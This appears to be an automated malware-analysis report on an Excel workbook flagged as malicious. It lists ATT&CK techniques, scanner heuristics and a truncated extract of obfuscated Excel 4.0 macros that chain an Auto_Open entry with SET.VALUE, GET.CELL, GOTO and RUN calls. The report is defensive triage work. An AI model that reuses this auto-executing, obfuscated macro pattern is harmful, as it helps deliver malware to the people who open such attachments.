MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains critical heuristics indicating obfuscated Excel 4.0 macros with an Auto_Open execution chain. The macros are designed to run automatically upon opening the document, suggesting a malicious intent to execute arbitrary code. The presence of an Auto_Open entry points to a spearphishing attachment delivery method.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAINExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 127981 bytes |
SHA-256: 880797d6df024252f777313e8526617b4325832a90d32f335eb1b83d4370e7e4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!C46084 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,GE37,"",0.06799704360679970083 ' Sheet,BL97,"",522.00000000000000000000 ' Sheet,JT100,"",281.00000000000000000000 ' Sheet,HY106,"",-780.80062499999996816769 ' Sheet,FO127,"",-0.07006369426751592189 ' Sheet,GN142,"",-1.58608695652173925517 ' Sheet,ER152,"",-7.75000000000000000000 ' Sheet,ED196,"",-0.26515151515151513806 ' Sheet,JN196,"",478.00000000000000000000 ' Sheet,IP231,"",1.91304347826086962314 ' Sheet,CP268,"SET.VALUE(DR35951,GET.CELL(38,FI25159)*-472.00000000000000000000/10)","" ' Sheet,CP269,GOTO(IG45162),"" ' Sheet,IU283,"",-489.00000000000000000000 ' Sheet,CB304,"SET.VALUE(IM32368,451/2*GET.CELL(19,HU2865))","" ' Sheet,CB305,RUN(CP268),"" ' Sheet,DP323,"",-0.35294117647058825815 ' Sheet,FW387,"",269.39999999999997726263 ' Sheet,DZ389,"",3.98387096774193549820 ' Sheet,HN410,"",-5.36538461538461497469 ' Sheet,EN458,"",10.31153846153846309619 ' Sheet,GG534,"",3.89411764705882346149 ' Sheet,CH543,"",-0.07484076433121018834 ' Sheet,EJ565,"",1.76706827309236946810 ' Sheet,HA666,"",-496.20000000000004547474 ' Sheet,CY693,"",532.00000000000000000000 ' Sheet,DH753,"",111.00000000000000000000 ' Sheet,HH767,"",-0.66906574820143882576 ' Sheet,BG784,"",-1.26415094339622635644 ' Sheet,IO823,"",52.87500000000000000000 ' Sheet,DK864,"",-4.25806451612903202886 ' Sheet,DC882,"",-1.75949367088607599996 ' Sheet,DC904,"",-88.00000000000000000000 ' Sheet,HN915,"",1.91304347826086962314 ' Sheet,J952,"",0.16407982261640799426 ' Sheet,D985,"",0.14360313315926892530 ' Sheet,JJ1015,"",55.00000000000000000000 ' Sheet,HI1016,"",0.08205893323386795335 ' Sheet,JA1024,"",487.00000000000000000000 ' Sheet,U1065,"",79.87500000000000000000 ' Sheet,FZ1148,"",-13.76666666666666571928 ' Sheet,JM1163,"",216.40015625000000909495 ' Sheet,DP1164,"",3.34136546184738936205 ' Sheet,GW1181,"",-1.89189189189189188589 ' Sheet,JJ1182,"",-2.07462686567164178442 ' Sheet,DW1221,"",-11.59298245614034961193 ' Sheet,JF1228,"",-13.65217391304347849257 ' Sheet,HV1278,"",-5.25000000000000000000 ' Sheet,BO1351,"",-132.00000000000000000000 ' Sheet,CD1378,"",-38.12500000000000000000 ' Sheet,FL1428,"",91.12500000000000000000 ' Sheet,GX1441,"",-0.35971223021582732216 ' Sheet,DO1488,"",-286.00000000000000000000 ' Sheet,CL1502,"",-6.75268817204301097235 ' Sheet,CK1521,"",-266.39999999999997726263 ' Sheet,BF1571,"",-88.12500000000000000000 ' Sheet,DW1593,"",264.39999999999997726263 ' Sheet,DM1594,"",73.87500000000000000000 ' Sheet,EB1637,"",-85.00000000000000000000 ' Sheet,IG1646,"",-630.50000000000000000000 ' Sheet,BO1712,"",107.00000000000000000000 ' Sheet,EC1752,"",-0.19672131147540983243 ' Sheet,CH1757,"",-105.12500000000000000000 ' Sheet,CV1761,"",463.00000000000000000000 ' Sheet,FV1805,"",486.20000000000004547474 ' Sheet,GA1807,"",-0.07710843373493976582 ' Sheet,BT1831,"",-372.00000000000000000000 ' Sheet,FU1882,"",173.00000000000000000000 ' Sheet,JR1920,"SET.VALUE(GC9538,GET.CELL(24,HX51270)-281)","" ' Sheet,JR1921,RUN(JJ3840),"" ' Sheet,A1987,"",-6.97014925373134364150 ' Sheet,HX1998,"",378.00000000000000000000 ' Sheet,CY2027,"",-281.39999999999997726263 ' Sheet,II2045,"",0.16851441241685144456 ' Sheet,IJ2061,"",0.28712871287128710618 ' Sheet,DU2065,"",-0.39047619047619047672 ' Sheet,JT2093,"",-3.96521739130434802689 ' Sheet,CV2120,"",-710.00000000000000000000 ' Sheet,DI2133,"",0.34501347708894880562 ' Sheet,FX2208,"",0.55580357142857139685 ' Sheet,EF2214,"",1.76107594936708866662 ' Sheet,JA2349,"",123.00000000000000000000 ' Sheet,DK2352,"",158.00000000000000000000 ' Sheet,IU2386,"",-70.0000000000000 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.